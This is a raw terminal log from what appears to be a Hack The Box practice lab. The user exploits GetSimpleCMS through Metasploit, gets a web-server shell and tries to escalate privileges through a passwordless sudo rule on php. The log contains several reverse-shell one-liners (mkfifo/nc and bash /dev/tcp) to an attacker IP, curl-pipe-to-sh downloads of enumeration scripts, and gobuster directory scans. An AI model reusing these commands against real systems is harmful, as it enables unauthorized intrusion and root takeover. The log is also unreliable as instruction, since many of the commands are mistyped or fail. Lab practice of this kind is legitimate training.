www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.15.44 8443 >/tmp/f');"
<| /bin/sh -i 2>&1 | nc 10.10.15.44 8443 >/tmp/f');"
^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
sudo -L
sudo -L
^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
^C
Abort session 2? [y/N] y
[*] 10.129.63.204 - Command shell session 2 closed. Reason: User exit
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[*] Started reverse TCP handler on 10.10.15.44:4444
[*] Command shell session 3 opened (10.10.15.44:4444 -> 10.129.63.204:34270) at 2025-06-24 04:04:32 -0400
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@gettingstarted:/var/www/html/theme$ cd /home
cd /home
www-data@gettingstarted:/home$ ls
ls
mrb3n
www-data@gettingstarted:/home$ cd mrb3n
cd mrb3n
www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ sudo l
sudo l
[sudo] password for www-data: sudo -l
Sorry, try again.
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
sudo: 3 incorrect password attempts
www-data@gettingstarted:/home/mrb3n$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
www-data@gettingstarted:/home/mrb3n$ wget wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
<sercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2025-06-24 08:11:41-- http://wget/
Resolving wget (wget)... failed: Temporary failure in name resolution.
wget: unable to resolve host address ‘wget’
--2025-06-24 08:11:41-- https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... failed: Temporary failure in name resolution.
wget: unable to resolve host address ‘raw.githubusercontent.com’
www-data@gettingstarted:/home/mrb3n$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
<sercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2025-06-24 08:11:56-- https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... failed: Temporary failure in name resolution.
wget: unable to resolve host address ‘raw.githubusercontent.com’
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@10.10.15.44
ssh kali-user@10.10.15.44
kali
kali
id
id
ls
ls
ssh: connect to host 10.10.15.44 port 22: Connection timed out
www-data@gettingstarted:/home/mrb3n$ kali
Command 'kali' not found, but can be installed with:
apt install kali
Please ask your administrator.
www-data@gettingstarted:/home/mrb3n$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@gettingstarted:/home/mrb3n$ ls
user.txt
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@10.10.15.44
ssh kali-user@10.10.15.44
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@192.168.78.128
ssh kali-user@192.168.78.128
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
<g/PEASS-ng/releases/latest/download/linpeas.sh | sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:02 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:03 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:04 --:--:-- 0curl: (6) Could not resolve host: github.com
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
<g/PEASS-ng/releases/latest/download/linpeas.sh | sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:- 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:02 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:03 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:04 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:06 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:07 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:08 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:09 --:--:-- 0curl: (6) Could not resolve host: github.com
www-data@gettingstarted:/home/mrb3n$ sudo nano /etc/ssh/sshd_config
sudo nano /etc/ssh/sshd_config
[sudo] password for www-data: ^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@10.10.15.44
ssh kali-user@10.10.15.44
kali
kali
ssh: connect to host 10.10.15.44 port 22: Connection timed out
www-data@gettingstarted:/home/mrb3n$ kali
Command 'kali' not found, but can be installed with:
apt install kali
Please ask your administrator.
www-data@gettingstarted:/home/mrb3n$ ping 10.10.15.44
ping 10.10.15.44
PING 10.10.15.44 (10.10.15.44) 56(84) bytes of data.
64 bytes from 10.10.15.44: icmp_seq=1 ttl=63 time=17.7 ms
64 bytes from 10.10.15.44: icmp_seq=2 ttl=63 time=17.1 ms
64 bytes from 10.10.15.44: icmp_seq=3 ttl=63 time=17.1 ms
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
64 bytes from 10.10.15.44: icmp_seq=4 ttl=63 time=17.4 ms
64 bytes from 10.10.15.44: icmp_seq=5 ttl=63 time=16.9 ms
64 bytes from 10.10.15.44: icmp_seq=6 ttl=63 time=16.7 ms
64 bytes from 10.10.15.44: icmp_seq=7 ttl=63 time=17.6 ms
64 bytes from 10.10.15.44: icmp_seq=8 ttl=63 time=17.2 ms
^C
--- 10.10.15.44 ping statistics ---
8 packets transmitted, 8 received, 0% packet loss, time 7011ms
rtt min/avg/max/mdev = 16.675/17.226/17.736/0.329 ms
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@10.10.15.44
ssh kali-user@10.10.15.44
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@10.10.15.44
ssh kali-user@10.10.15.44
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
<me/mrb3n$ bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
id
id
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
<me/mrb3n$ bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "system("bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
< "system("bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "system("bash -i >& /dev/tcp/10.10.15.44/4444 0>&1");"
<stem("bash -i >& /dev/tcp/10.10.15.44/4444 0>&1");"
^C
Abort session 3? [y/N] ^C
[*] 10.129.63.204 - Command shell session 3 closed. Reason: User exit
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > Interrupt: use the 'exit' command to quit
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > Interrupt: use the 'exit' command to quit
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > M
[-] Unknown command: M. Run the help command for more details.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > exit
e
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ gobuster dir -u http://10.129.63.204 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.63.204
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/admin (Status: 301) [Size: 314] [--> http://10.129.63.204/admin/]
/backups (Status: 301) [Size: 316] [--> http://10.129.63.204/backups/]
/data (Status: 301) [Size: 313] [--> http://10.129.63.204/data/]
/index.php (Status: 200) [Size: 5485]
/plugins (Status: 301) [Size: 316] [--> http://10.129.63.204/plugins/]
/robots.txt (Status: 200) [Size: 32]
/server-status (Status: 403) [Size: 278]
/sitemap.xml (Status: 200) [Size: 431]
/theme (Status: 301) [Size: 314] [--> http://10.129.63.204/theme/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ gobuster dir -u http://10.129.63.204/admin -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.63.204/admin
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/humans.txt (Status: 200) [Size: 828]
/inc (Status: 301) [Size: 318] [--> http://10.129.63.204/admin/inc/]
/index.php (Status: 200) [Size: 2623]
/lang (Status: 301) [Size: 319] [--> http://10.129.63.204/admin/lang/]
/template (Status: 301) [Size: 323] [--> http://10.129.63.204/admin/template/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================